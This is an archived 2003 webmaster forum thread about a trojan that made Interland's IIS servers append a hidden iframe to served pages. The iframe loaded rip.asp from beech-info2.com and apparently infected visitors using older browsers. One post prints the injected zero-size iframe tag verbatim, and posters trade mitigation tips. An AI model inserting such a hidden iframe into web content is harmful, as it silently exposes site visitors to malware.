Welcome to WebmasterWorld Guest from 184.108.40.206
Forum Moderators: phranque
My company's site is on an interland windows server. This afternoon 8/28/03 something bizarre began to happen...
Upon loading our site, the URL in the status bar read something like "Opening Page"... www.widgit.com/_vti_con/rip.asp
That is NOT our URL. The status bar should have OUR URL. I called Interland about 6:00pm 8/28/03 and they said they were working to remove the problem.
I learned that there is a Trojan which adds some script to all the HTML files on the WebServer. Interland said they experienced this several months ago, and now, in the last 24 hours a new version of the Trojan has struck back again.
One of our computers at the office started popping Desktop Icons on the Desktop... Its name was malware334.exe
But the real way of seeing if your site is affected is to check the bottom of your HTML page. If infected, the trojan adds an <iframe> tag with an HREF to the beech-info2.com site.
I could say more, but I'm exhausted right now from lack of sleep.
So I just wanted to alert anyone who either SURFS on sites hosted by Interland -OR- manages sites hosted by Interland.
If you surf to an infected site, your computer can become infected, depending on your OS and browser versions.
And if anyone can shed some more light on this matter, I'd be very grateful.
Interland says they have deleted the embedded scripts in the infected HTML files, as well as whatever else needed to be done.
As a precaution, I've taken my site down until I can be sure this problem is truly resolved.
The site does appear to be clean now, however.
I'm wondering if I should just wipe out everything on my virtual server with them and upload a fresh set of files.
I would try to get regular updates from them as to when they will be clean .. then go in a check the damage and replace your sites at that time ... if you can redirect users to a holding page for a day or so .. how long can it take them to sort themselves out?
What else should I do Webmaster World members?
Interestingly, I found a forum B.B. where an earlier version of this trojan was discussed in May 2003, which ALSO affected Interland servers...
It only takes a minute to read, if you're interested.
[edited by: Brett_Tabke at 9:35 am (utc) on Sep. 4, 2003]
joined:Nov 20, 2000
If it's an important site that you depend upon for income, always have control of the domain name and access to a backup host, perhaps a multi-host (even a cheapie at a handful of $ per month).
That way, as soon as you hit a problem you can re-point.
Worst scenario then is maybe 24-48 hours. Not wonderful, but a lot better than sitting there a day later with maybe the host still not having sorted the problem. You can always point back if it's sorted quickly... but you can't recapture time if it isn't.
Two quick notes:
1) people who surf the web on WinNT-based systems (including Win NT, Win 2K, and Win XP) should probably add a line to their hosts file pointing www.beech-info2.com to 127.0.0.1, so they don't access this rip.asp file.
2) I FTP'd to the webserver, and it looks like the files aren't being infected - it's IIS that's appending this <IFRAME> tag just before serving the file. The files on my server don't have said <IFRAME> in the code. Just a heads up to anybody running an IIS webserver and looking for this infection. That means re-uploading your files won't help, either, since the files are untouched.
Unfortunately, this doesn't appear to do the trick.
I hope this is fixed soon by Interland, and hope to see some kind of status report from them soon.
You could also add a HTML open comment to the end of every page, that might work. Just <!-- at the end of every page, since this IFRAME is being appended to the end of the file... So the browser will think the IFRAME is a comment and not parse it.
Other than that, add the 127.0.0.1 www.beech-info2.com to your hosts file to keep your *local* machine from being infected. Looks like this IIS infection is just to open up distribution of *another* virus.
My shared server and domain became infected today (9/2/03). The infection seems to be spreading; search the string in Google and it is now up to 5 pages of sites w/infection).
Interland claims to know of the infection and says they have written a job script to remove references and fix the IIS side of things.
It seems, though, that they don't have a good handle on this. The first post in this thread goes back to 8/28 and I was infected at about 4pm Eastern today.
The reseller support tech I worked with knew of the issue, but had no info that would assist me.
That is the latest update from shared-server hosting hell.
Turns out this guy is *actively* hacking Interland. They supposedly have a Microsoft dude flown in, and they're doing a little mano-a-mano. Who knows? The hope is to be "permanently patched in 12 to 24 hours." Ugh.
"Previously unknown IIS exploit," where have I heard those words before...?
Thought I'd add a symptom for those (like me) who get baffled by things disappearing from their web sites.
This is how we first realized something was wrong.
As of 15:50 UTC on Sept 3, my client's web site is still infected. I have strongly recommended to them that they switch to a different ISP (right now, we're redirecting their web site to mine, which doesn't use Interland).
<snip>signature line two</snip>
<snip>signature line three</snip>
[edited by: DaveAtIFG at 3:59 pm (utc) on Sep. 3, 2003]
The iframe footer is a dynamic footer that has been added to the IIS 5 configuration of the server aka "Global Footer". Low end hosts use this feature in IIS 5 to add advertisements and other such things to a customers page. This is not an infection of the web server itself. The source file that the footer is pointing to [wvw.beech-info2.com...] is the source of the trojan virus. NOTE:'wVw'.beech-info2.com. In order to pull off such a hack you would have to have a script located in Interland's network that ran at a regular interval, along with some other hacking tools to gain access to the servers IIS configuration. Their are alot of legitimate scripts that do this. The only malicious thing about this is the source file rip.asp.
The domain name beech-info2.com is owned by ryan shepherd (firstname.lastname@example.org) but I am sure he is unaware of this situation. If the hacker has half a brain he will have hacked this poor guys DNS and added an A record to resolve wvw to a different IP than the one that is listed for beech-info2.com. Or the domain was bought under false information, either way it is almost completely untraceable. The bad ting is, is that all host are vulnerable to this. This hacker just chose Interland to reep havoc on.
There's also ww, www, wvw : beech-info2.com... The TLD and WWW point to one place, all others point to different places. I'd like to know there are no other aliases out there waiting!
The attack on July 28th was the above IP, with a URL in the iframe of IP/cgi-bin/inf.htm, which redirected to a file named readme.pl, which triggered a file download like this time. Maybe the hole from May 18, 2003 was never plugged, and not plugged again on July 28th? To think that the attack this time was exactly one month after the one in July.... Also, with the beech-info.com information on the LabMice.net attack (that was the URL in the iframe), and the beech-info2.com URL, seems pretty certain this is the same guy or gal, or more backlash of the same original hack. All three iframe attacks do appear to be from the same person.
View --> Privacy Report...
If you see something from *.beech-info* then you are seeing a page with the IIS footer set with the malicious iframe tags.
If you add beech-info2.com to your restricted sites zone, you will see an "Unknown (Mixed)" security zone displayed in your IE status bar. I get a "Your current security settings prevent you from running ActiveX controls on this page. As a result, the page may not display correctly." (thankfully) - I visit an infected page.
I currently have one page still affected, but others appear to be fixed. Reloaded and cleared cache, but still there.
I've been away from the FORUMS for a few days since I started this thread. Going nuts with this thing.
Anyway, on Sept 3, we called Interland's Sales people and requested a switch over to a UNIX server.
Within hours I received an email confirmation & then called back to confirm the switch. Then, a few hours later our Domain Name was pointing to the NEW IP address.
So we are through with the IIS server, and its UNIX from here on out.
The transition went very smoothly working with their sales people.
I'll be uploading a fresh set of files in the coming day or two.
If you don't need the features of a Windows server, you may want to make the switch. Hopefully, this will work out well.
If you do stick with Windows, keep us posted as to your progress with the Bug.
P.S. the rip.asp file as you probably know contains an object tag pointing to a perl file called inf2.pl
I think I have a copy of what reads inside of it. I'll post the info later. Its kind of interesting. But I'm late for work right now. gotta go.
P.P.S. I have one NEW question about the Nix box. When I used to FTP on win server, the file size was always the same on both "panes" of my WS_FTP program.
But now when I upload a 186 byte file to the Nix box, the remote pane on the Nix server displays the file size as 179 bytes. WHAT'S UP WITH THIS? Thanks for any insights you may have...
<% response.end %>
From a webmaster standpoint, it would be nice to help prevent new browsers from being infected.
Our symptom is that menus are disabled in Internet Explorer. When I look at the source , this is what I see:
<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>
So it *ought* to be commented out, but it's not (the menus are still disabled).
Don't hold me to this, but our experience with this bug suggests that if you're surfing on IE 5.5 sp2 or IE 6.0 with updated service packs, then the bug's ultimate goal of "infecting" your PC won't be realized.
However, if you surf to an infected site on anything less than IE 5.5 sp2, then your PC could be maliously infested with malware.exe files and DLL files, which can be difficult to search & destroy.
This is how we learned of the issue last week... One of our older PCs had IE 5.0 and that employee's machine was hit with the desktop exe icons that I mentioned in my 1st message.
Of course, it's still disconcerting to have this thing poking its nose into your PC, but I don't think it will do any real damage if your updated sufficiently. Again, that's just my opinion.
The inf2.pl file that I mentioned this morning seems to contain the script that creates the malware.exe files on the PC's hard drive. We also identified a file named wiroivd that we believe was associated with the bug, but only on IE 5.0 machines.
We do have rip.asp or rip.htm files in the Cache of our XP machines, but they never successfully retrieved the perl file from the beech-info site.
What we HAVE experienced on XP machines with IE 6 is that "sometimes" a surfer will get a "Network Log In" pop up which requests their UserName and password. The "site" and "realm" listed on the pop up does say beech-info2 however.
Hopefully, most folks would be saavy enough to question this sort of behavior on their PC, though I'm sure many would not.
Also, as mnamesir mentioned, this thing seems to be changing its target URL almost daily. We never experienced that, but another Interland customer that I've been in touch with did say that the URL was being modified from the original beech-info2 domain name.
Of course now that we've switched to unix, everything is back to normal. But I do feel for all of you who are dealing with this issue. Please keep us posted as to your progress.
They also said that they didn't know what this was two weeks ago and were trying to spot clean it one virtual site at a time.
Once they realized it was server-based and that cleaned sites were being re-infected, they moved to a batch script and isolated the servers. For now, that seems to have done the trick.
My sites are all still clean, although I had to clear my cache just to be sure. One clean site was still showing locally as infected until I cleared.